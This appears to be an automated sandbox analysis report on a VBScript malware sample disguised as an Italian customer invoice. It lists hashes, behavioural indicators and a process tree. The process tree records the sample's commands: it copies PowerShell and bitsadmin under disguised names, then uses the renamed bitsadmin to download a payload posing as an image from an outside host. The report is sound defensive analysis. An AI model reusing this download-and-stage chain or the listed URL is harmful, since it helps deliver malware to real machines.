Analysis
-
max time kernel
63s -
max time network
33s -
platform
windows7_x64 -
resource
win7 -
submitted
13-07-2020 07:40
Static task
static1
Behavioral task
behavioral1
Sample
Fatt_cliente_07008120482.vbs
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Fatt_cliente_07008120482.vbs
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
Fatt_cliente_07008120482.vbs
-
Size
4KB
-
MD5
740e42ba34a3eb4f22a7f2ce3a738a5c
-
SHA1
ad8a96ca8d57f0d18ff06366d507d547deb051b0
-
SHA256
1b30d432a173c580e9c49c492974bb046d9702bb53a80eccd5c4137ecf9ef839
-
SHA512
f15559533b8dadf6571e141347db4c90c4679fd57346760a4912d94d6dcc33b4049bc93565ae9acb75324b039c065f78a294dfff9594a73a6d7fcdbfee3bba54
Score
8/10
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
WScript.exedescription pid process target process PID 1124 wrote to memory of 608 1124 WScript.exe cmd.exe PID 1124 wrote to memory of 608 1124 WScript.exe cmd.exe PID 1124 wrote to memory of 608 1124 WScript.exe cmd.exe PID 1124 wrote to memory of 1480 1124 WScript.exe cmd.exe PID 1124 wrote to memory of 1480 1124 WScript.exe cmd.exe PID 1124 wrote to memory of 1480 1124 WScript.exe cmd.exe PID 1124 wrote to memory of 912 1124 WScript.exe wubvVZY.exe PID 1124 wrote to memory of 912 1124 WScript.exe wubvVZY.exe PID 1124 wrote to memory of 912 1124 WScript.exe wubvVZY.exe PID 1124 wrote to memory of 912 1124 WScript.exe wubvVZY.exe -
Executes dropped EXE 1 IoCs
Processes:
wubvVZY.exepid process 912 wubvVZY.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fatt_cliente_07008120482.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\zwubvVZY.exe2⤵PID:608
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\wubvVZY.exe2⤵PID:1480
-
C:\Users\Admin\AppData\Roaming\wubvVZY.exe"C:\Users\Admin\AppData\Roaming\wubvVZY.exe" /transfer VWCWnV /download https://sheyenneweber.com/webol/07008120482/logo.jpg C:\Users\Admin\AppData\Roaming\logo.jpg2⤵
- Executes dropped EXE
PID:912